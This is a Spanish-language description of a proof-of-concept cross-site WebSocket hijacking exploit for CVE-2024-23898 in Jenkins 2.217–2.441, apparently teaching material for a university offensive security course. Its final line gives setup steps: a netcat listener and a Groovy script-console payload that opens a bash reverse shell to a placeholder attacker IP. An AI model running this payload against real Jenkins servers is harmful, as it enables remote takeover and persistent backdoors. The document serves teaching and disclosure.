
Una prueba de concepto de exploit de secuestro de WebSocket entre sitios (cross-site WebSocket hijacking) para CVE-2024-23898 — una vulnerabilidad que afecta a las versiones de Jenkins 2.217-2.441. Para uso educativo en el curso Hacking & Offensive Security de la Universidad Carnegie Mellon.
Una prueba de concepto de explotación de secuestro de WebSocket entre sitios para CVE-2024-23898 — una vulnerabilidad que afecta a las versiones de Jenkins 2.217-2.441.
Este exploit ataca la CLI de Jenkins, que se puede utilizar para acceder de forma remota y enviar comandos a un servidor de control de Jenkins. Mediante este exploit, un atacante remoto puede obtener acceso y establecer una puerta trasera persistente en un servidor de control de Jenkins si se engaña a un administrador para que visite un sitio malicioso mientras está conectado al servidor de control de Jenkins objetivo.
Este código está destinado únicamente a fines educativos y al uso exclusivo del curso Hacking & Offensive Security de la Universidad Carnegie Mellon. Este código no debe ser utilizado como arma ni emplearse para crear malware. Los autores condenan explícitamente cualquier intento de hacerlo.
nc -l <port_num> (reemplace <port_num> con cualquier número de puerto sin usar)ipconfig getifaddr en0[http://localhost:8080/script](http://localhost:8080/script). Inicie sesión con la cuenta de administrador si aún no lo ha hecho.['bash', '-c', 'bash -i >& /dev/tcp/<attacker_ip>/<port_num> 0>&1'].execute()